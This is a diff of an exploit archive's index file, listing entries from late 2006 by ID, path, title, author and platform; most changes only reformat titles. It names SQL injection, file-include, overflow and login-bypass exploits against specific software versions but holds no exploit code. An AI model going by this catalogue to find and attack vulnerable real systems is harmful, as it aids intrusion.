Exploit",2006-11-11,ajann,asp,webapps,0 +2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 - (Products.asp) Remote SQL Injection",2006-11-11,ajann,asp,webapps,0 +2757,platforms/asp/webapps/2757.pl,"NuSchool 1.0 - (CampusNewsDetails.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 +2758,platforms/php/webapps/2758.php,"phpwcms <= 1.2.6 - (Cookie: wcs_user_lang) Local File Include Exploit",2006-11-11,Kacper,php,webapps,0 +2759,platforms/php/webapps/2759.php,"PHPWind <= 5.0.1 - (AdminUser) Remote Blind SQL Injection Exploit",2006-11-12,rgod,php,webapps,0 +2760,platforms/php/webapps/2760.php,"Rama CMS <= 0.68 - (Cookie: lang) Local File Include Exploit",2006-11-12,Kacper,php,webapps,0 +2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - (switch.asp) Remote SQL Injection Exploit",2006-11-12,ajann,asp,webapps,0 +2762,platforms/asp/webapps/2762.asp,"ASPPortal <= 4.0.0 - (default1.asp) Remote SQL Injection Exploit",2006-11-12,ajann,asp,webapps,0 +2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - (detail.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 +2764,platforms/asp/webapps/2764.txt,"USupport 1.0 - (detail.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 +2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta (user_standard.php) Remote File Include Exploit",2006-11-12,DeltahackingTEAM,php,webapps,0 -2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 (baseDir) Remote File Include Vulnerabilities",2006-11-12,v1per-haCker,php,webapps,0 +2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - (baseDir) Remote File Include Vulnerabilities",2006-11-12,v1per-haCker,php,webapps,0 2768,platforms/php/webapps/2768.txt,"contentnow 1.30 - (local/upload/delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 -2769,platforms/php/webapps/2769.php,"Quick.Cart <= 2.0 (actions_client/gallery.php) Local File Include Exploit",2006-11-13,Kacper,php,webapps,0 +2769,platforms/php/webapps/2769.php,"Quick.Cart <= 2.0 - (actions_client/gallery.php) Local File Include Exploit",2006-11-13,Kacper,php,webapps,0 2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver Probe Response SSID Overflow Exploit (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow Exploit (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 -2772,platforms/asp/webapps/2772.htm,"Online Event Registration <= 2.0 (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 +2772,platforms/asp/webapps/2772.htm,"Online Event Registration <= 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager <= 1.3 - (default.asp) Login Bypass",2006-11-13,ajann,asp,webapps,0 -2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 +2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Include Vulnerabilities",2006-11-13,Firewall,php,webapps,0 2776,platforms/php/webapps/2776.txt,"contentnow 1.30 - (Upload/XSS) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 -2777,platforms/php/webapps/2777.txt,"Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities",2006-11-14,navairum,php,webapps,0 +2777,platforms/php/webapps/2777.txt,"Aigaion <= 1.2.1 - (DIR) Remote File Include Vulnerabilities",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"phpPeanuts 1.3 Beta (Inspect.php) Remote File Include",2006-11-14,"Hidayat Sagita",php,webapps,0 -2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection",2006-11-14,ajann,asp,webapps,0 -2780,platforms/asp/webapps/2780.txt,"NetVIOS <= 2.0 (page.asp) Remote SQL Injection",2006-11-14,ajann,asp,webapps,0 +2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - (default.asp) Login ByPass SQL Injection",2006-11-14,ajann,asp,webapps,0 +2780,platforms/asp/webapps/2780.txt,"NetVIOS <= 2.0 - (page.asp) Remote SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - (XSS/auth bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 -2783,platforms/windows/dos/2783.html,"WinZIP <= 10.0.7245 (FileView ActiveX Control) Stack Overflow PoC",2006-11-14,prdelka,windows,dos,0 -2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 (smbclient) Remote Code Execution Exploit",2006-11-14,"Teemu Salmela",multiple,remote,0 -2785,platforms/windows/remote/2785.c,"WinZIP <= 10.0.7245 (FileView ActiveX) Remote Buffer Overflow Exploit",2006-11-15,prdelka,windows,remote,0 +2783,platforms/windows/dos/2783.html,"WinZIP <= 10.0.7245 - (FileView ActiveX Control) Stack Overflow PoC",2006-11-14,prdelka,windows,dos,0 +2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution Exploit",2006-11-14,"Teemu Salmela",multiple,remote,0 +2785,platforms/windows/remote/2785.c,"WinZIP <= 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow Exploit",2006-11-15,prdelka,windows,remote,0 2786,platforms/php/webapps/2786.txt,"torrentflux <= 2.2 - (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 -2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0 +2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 - (libucache.dylib) Privilege Escalation Exploit (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0 -2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0 +2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 - (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 -2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0 +2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 - (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0 2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - (textview.php) Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0 -2796,platforms/php/webapps/2796.php,"miniCWB <= 1.0.0 (contact.php) Local File Include Exploit",2006-11-17,Kacper,php,webapps,0 +2796,platforms/php/webapps/2796.php,"miniCWB <= 1.0.0 - (contact.php) Local File Include Exploit",2006-11-17,Kacper,php,webapps,0 2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 -2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 +2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Include",2006-11-17,bd0rk,php,webapps,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Include Exploit",2006-11-17,Crackers_Child,php,webapps,0 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Include",2006-11-17,DeltahackingTEAM,php,webapps,0 2809,platforms/windows/remote/2809.py,"Microsoft Windows NetpManageIPCConnect - Stack Overflow Exploit (Python)",2006-11-18,"Winny Thomas",windows,remote,445 -2810,platforms/php/webapps/2810.php,"Oxygen <= 1.1.3 (O2PHP Bulletin Board) Remote SQL Injection Exploit",2006-11-18,DarkFig,php,webapps,0 -2811,platforms/php/webapps/2811.txt,"phpWebThings <= 1.5.2 (editor.php) Remote File Include",2006-11-18,nuffsaid,php,webapps,0 -2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader <= 1.5 (save.php) Remote Code Execution Exploit",2006-11-18,nuffsaid,php,webapps,0 -2813,platforms/asp/webapps/2813.txt,"ASPNuke <= 0.80 (register.asp) Remote SQL Injection",2006-11-19,ajann,asp,webapps,0 -2814,platforms/php/webapps/2814.txt,"PHPQuickGallery <= 1.9 (textFile) Remote File Include",2006-11-19,"Al7ejaz Hacker",php,webapps,0 +2810,platforms/php/webapps/2810.php,"Oxygen <= 1.1.3 - (O2PHP Bulletin Board) Remote SQL Injection Exploit",2006-11-18,DarkFig,php,webapps,0 +2811,platforms/php/webapps/2811.txt,"phpWebThings <= 1.5.2 - (editor.php) Remote File Include",2006-11-18,nuffsaid,php,webapps,0 +2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader <= 1.5 - (save.php) Remote Code Execution Exploit",2006-11-18,nuffsaid,php,webapps,0 +2813,platforms/asp/webapps/2813.txt,"ASPNuke <= 0.80 - (register.asp) Remote SQL Injection",2006-11-19,ajann,asp,webapps,0 +2814,platforms/php/webapps/2814.txt,"PHPQuickGallery <= 1.9 - (textFile) Remote File Include",2006-11-19,"Al7ejaz Hacker",php,webapps,0 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow Exploit",2006-11-20,"Greg Linares",windows,local,0 -2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 (adminprint.php) Remote File Include",2006-11-21,irvian,php,webapps,0 -2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 (src/ark_inc.php) Remote File Include",2006-11-21,DeltahackingTEAM,php,webapps,0 +2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Include",2006-11-21,irvian,php,webapps,0 +2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - (src/ark_inc.php) Remote File Include",2006-11-21,DeltahackingTEAM,php,webapps,0 2819,platforms/php/webapps/2819.txt,"LDU <= 8.x - (avatarselect id) Remote SQL Injection",2006-11-21,nukedx,php,webapps,0 -2820,platforms/php/webapps/2820.txt,"Seditio <= 1.10 (avatarselect id) Remote SQL Injection",2006-11-21,nukedx,php,webapps,0 -2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 (PLS) Local/Remote Buffer Overflow Exploit",2006-11-21,"Greg Linares",windows,remote,0 -2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 (pageid) Remote SQL Injection Exploit",2006-11-21,Revenge,php,webapps,0 +2820,platforms/php/webapps/2820.txt,"Seditio <= 1.10 - (avatarselect id) Remote SQL Injection",2006-11-21,nukedx,php,webapps,0 +2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - (PLS) Local/Remote Buffer Overflow Exploit",2006-11-21,"Greg Linares",windows,remote,0 +2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - (pageid) Remote SQL Injection Exploit",2006-11-21,Revenge,php,webapps,0 2823,platforms/php/webapps/2823.txt,"aBitWhizzy (abitwhizzy.php) Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0 -2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 (ASX Filename) Local Buffer Overflow Exploit",2006-11-21,"Greg Linares",windows,local,0 +2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow Exploit",2006-11-21,"Greg Linares",windows,local,0 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Include Vulnerabilities",2006-11-21,3l3ctric-Cracker,php,webapps,0 2827,platforms/php/webapps/2827.txt,"phpPC <= 1.04 - Multiple Remote File Inclusion Vulnerabilities",2006-11-21,iss4m,php,webapps,0 -2828,platforms/asp/webapps/2828.pl,"fipsCMS <= 4.5 (index.asp) Remote SQL Injection Exploit",2006-11-22,ajann,asp,webapps,0 -2829,platforms/asp/webapps/2829.txt,"fipsGallery <= 1.5 (index1.asp) Remote SQL Injection",2006-11-22,ajann,asp,webapps,0 -2830,platforms/asp/webapps/2830.txt,"fipsForum <= 2.6 (default2.asp) Remote SQL Injection",2006-11-22,ajann,asp,webapps,0 +2828,platforms/asp/webapps/2828.pl,"fipsCMS <= 4.5 - (index.asp) Remote SQL Injection Exploit",2006-11-22,ajann,asp,webapps,0 +2829,platforms/asp/webapps/2829.txt,"fipsGallery <= 1.5 - (index1.asp) Remote SQL Injection",2006-11-22,ajann,asp,webapps,0 +2830,platforms/asp/webapps/2830.txt,"fipsForum <= 2.6 - (default2.asp) Remote SQL Injection",2006-11-22,ajann,asp,webapps,0 2831,platforms/php/webapps/2831.txt,"a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0 2832,platforms/php/webapps/2832.txt,"Messagerie Locale (centre.php) - Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 2833,platforms/php/webapps/2833.txt,"Site News (centre.php) - Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 2834,platforms/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - Remote SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 2835,platforms/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - Remote SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 -2836,platforms/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 (index.asp) Remote SQL Injection",2006-11-23,ajann,php,webapps,0 +2836,platforms/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - (index.asp) Remote SQL Injection",2006-11-23,ajann,php,webapps,0 2837,platforms/multiple/remote/2837.sql,"Oracle <= 9i / 10g (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 -2838,platforms/php/webapps/2838.txt,"HSRS 1.0 (addcode.php) Remote File Include",2006-11-23,"Cold Zero",php,webapps,0 -2839,platforms/php/webapps/2839.txt,"OWLLib 1.0 (OWLMemoryProperty.php) Remote File Include",2006-11-23,DeltahackingTEAM,php,webapps,0 +2838,platforms/php/webapps/2838.txt,"HSRS 1.0 - (addcode.php) Remote File Include",2006-11-23,"Cold Zero",php,webapps,0 +2839,platforms/php/webapps/2839.txt,"OWLLib 1.0 - (OWLMemoryProperty.php) Remote File Include",2006-11-23,DeltahackingTEAM,php,webapps,0 2840,platforms/php/webapps/2840.txt,"PEGames (index.php) Remote File Include",2006-11-23,DeltahackingTEAM,php,webapps,0 2841,platforms/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection Exploit",2006-11-24,rgod,php,webapps,0 2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection Exploit",2006-11-23,rgod,php,webapps,0 2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit",2006-11-24,DeltahackingTEAM,php,webapps,0 -2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0 -2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk <= 0.97.3 (details.asp) SQL Injection",2006-11-25,ajann,asp,webapps,0 +2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0 +2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk <= 0.97.3 - (details.asp) SQL Injection",2006-11-25,ajann,asp,webapps,0 2847,platforms/php/webapps/2847.txt,"Sisfo Kampus <= 0.8 - Remote File Inclusion / Download Vulnerabilities",2006-11-25,"Wawan Firmansyah",php,webapps,0 -2848,platforms/asp/webapps/2848.txt,"Basic Forum <= 1.1 (edit.asp) Remote SQL Injection",2006-11-25,bolivar,asp,webapps,0 +2848,platforms/asp/webapps/2848.txt,"Basic Forum <= 1.1 - (edit.asp) Remote SQL Injection",2006-11-25,bolivar,asp,webapps,0 2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community <= 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0 -2850,platforms/php/webapps/2850.txt,"Exhibit Engine <= 1.22 (styles.php) Remote File Include",2006-11-25,Kacper,php,webapps,0 +2850,platforms/php/webapps/2850.txt,"Exhibit Engine <= 1.22 - (styles.php) Remote File Include",2006-11-25,Kacper,php,webapps,0 2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod <= 1.21 - Remote SQL Injection",2006-11-26,"the master",php,webapps,0 2852,platforms/php/webapps/2852.txt,"com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0 -2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection",2006-11-26,bolivar,asp,webapps,0 +2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 - (admin/edit.asp) Remote SQL Injection",2006-11-26,bolivar,asp,webapps,0 2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow Exploit (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 2857,platforms/multiple/dos/2857.php,"PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0 2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0 2859,platforms/php/webapps/2859.php,"Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0 -2860,platforms/windows/dos/2860.c,"Quintessential Player <= 4.50.1.82 (Playlist) Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 +2860,platforms/windows/dos/2860.c,"Quintessential Player <= 4.50.1.82 - (Playlist) Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2861,platforms/windows/dos/2861.c,"Songbird Media Player <= 0.2 Format String Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 2863,platforms/php/webapps/2863.php,"kubix <= 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 @@ -2545,9 +2545,9 @@ id,file,description,date,author,platform,type,port 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit",2006-11-30,"Tan Chew Keong",windows,remote,0 2867,platforms/php/webapps/2867.php,"PHPGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 -2869,platforms/php/webapps/2869.php,"Serendipity <= 1.0.3 (comment.php) Local File Include Exploit",2006-11-30,Kacper,php,webapps,0 +2869,platforms/php/webapps/2869.php,"Serendipity <= 1.0.3 - (comment.php) Local File Include Exploit",2006-11-30,Kacper,php,webapps,0 2870,platforms/windows/remote/2870.rb,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 -2871,platforms/php/webapps/2871.txt,"LDU <= 8.x (polls.php) Remote SQL Injection",2006-11-30,ajann,php,webapps,0 +2871,platforms/php/webapps/2871.txt,"LDU <= 8.x - (polls.php) Remote SQL Injection",2006-11-30,ajann,php,webapps,0 2872,platforms/windows/local/2872.c,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit",2006-11-30,Expanders,windows,local,0 2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0 2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / tnftpd Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0 @@ -2559,202 +2559,202 @@ id,file,description,date,author,platform,type,port 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - (XSS/Local File Disclosure) Vulnerabilities",2006-12-01,ajann,asp,webapps,0 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Path Disclosure/Include) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 -2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 (search.php) Remote Include",2006-12-02,DeltahackingTEAM,php,webapps,0 +2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - (search.php) Remote Include",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies <= 1.3.0 - Remote File Include",2006-12-02,bd0rk,php,webapps,0 2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - (activate.php) File Include Vulnerabilities",2006-12-03,GregStar,php,webapps,0 2887,platforms/windows/remote/2887.pl,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow Exploit",2006-12-03,"Jacopo Cervini",windows,remote,69 -2888,platforms/php/webapps/2888.php,"Envolution <= 1.1.0 (PNSVlang) Remote Code Execution Exploit",2006-12-03,Kacper,php,webapps,0 -2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 (categories.php) Local File Inclusion Exploit",2006-12-03,r0ut3r,php,webapps,0 -2890,platforms/php/webapps/2890.txt,"php-revista <= 1.1.2 (adodb) Multiple Remote File Include Vulnerabilities",2006-12-03,"Cold Zero",php,webapps,0 +2888,platforms/php/webapps/2888.php,"Envolution <= 1.1.0 - (PNSVlang) Remote Code Execution Exploit",2006-12-03,Kacper,php,webapps,0 +2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion Exploit",2006-12-03,r0ut3r,php,webapps,0 +2890,platforms/php/webapps/2890.txt,"php-revista <= 1.1.2 - (adodb) Multiple Remote File Include Vulnerabilities",2006-12-03,"Cold Zero",php,webapps,0 2891,platforms/php/webapps/2891.txt,"cutenews aj-fork <= 167f (cutepath) Remote File Include",2006-12-04,DeltahackingTEAM,php,webapps,0 2892,platforms/linux/dos/2892.py,"F-Prot Antivirus 4.6.6 - (ACE) Denial of Service Exploit",2006-12-04,"Evgeny Legerov",linux,dos,0 -2893,platforms/linux/dos/2893.py,"F-Prot Antivirus 4.6.6 (CHM) Heap Overflow Exploit PoC",2006-12-04,"Evgeny Legerov",linux,dos,0 -2894,platforms/php/webapps/2894.txt,"Phorum <= 3.2.11 (common.php) Remote File Include",2006-12-06,Mr-m07,php,webapps,0 +2893,platforms/linux/dos/2893.py,"F-Prot Antivirus 4.6.6 - (CHM) Heap Overflow Exploit PoC",2006-12-04,"Evgeny Legerov",linux,dos,0 +2894,platforms/php/webapps/2894.txt,"Phorum <= 3.2.11 - (common.php) Remote File Include",2006-12-06,Mr-m07,php,webapps,0 2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface <= 2.1b (link) Remote File Include Exploit",2006-12-07,3l3ctric-Cracker,php,webapps,0 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) <= 1.2.1015 File Include",2006-12-08,3l3ctric-Cracker,php,webapps,0 -2897,platforms/php/webapps/2897.txt,"CM68 News <= 12.02.06 (addpth) Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 -2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 +2897,platforms/php/webapps/2897.txt,"CM68 News <= 12.02.06 - (addpth) Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 +2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - (render.php) Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection",2006-12-08,koray,php,webapps,0 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0 -2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 -2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 +2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 +2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include",2006-12-09,bd0rk,php,webapps,0 -2905,platforms/php/webapps/2905.txt,"Gizzar <= 03162002 (index.php) Remote File Include",2006-12-09,DeltahackingTEAM,php,webapps,0 -2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 (news.php) Remote SQL Injection Exploit",2006-12-09,Bl0od3r,php,webapps,0 -2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 (login.asp) Remote SQL Injection",2006-12-09,ajann,asp,webapps,0 -2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 (product) Remote SQL Injection",2006-12-09,ajann,asp,webapps,0 -2909,platforms/asp/webapps/2909.txt,"HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass",2006-12-09,ajann,asp,webapps,0 +2905,platforms/php/webapps/2905.txt,"Gizzar <= 03162002 - (index.php) Remote File Include",2006-12-09,DeltahackingTEAM,php,webapps,0 +2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - (news.php) Remote SQL Injection Exploit",2006-12-09,Bl0od3r,php,webapps,0 +2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - (login.asp) Remote SQL Injection",2006-12-09,ajann,asp,webapps,0 +2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - (product) Remote SQL Injection",2006-12-09,ajann,asp,webapps,0 +2909,platforms/asp/webapps/2909.txt,"HR Assist <= 1.05 - (vdateUsr.asp) Remote Login ByPass",2006-12-09,ajann,asp,webapps,0 2910,platforms/multiple/dos/2910.txt,"Sophos Antivirus - .CHM File Heap Overflow PoC",2006-12-10,"Damian Put",multiple,dos,0 2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0 2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0 -2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 +2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 - (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 - (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0 -2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 +2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 - (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0 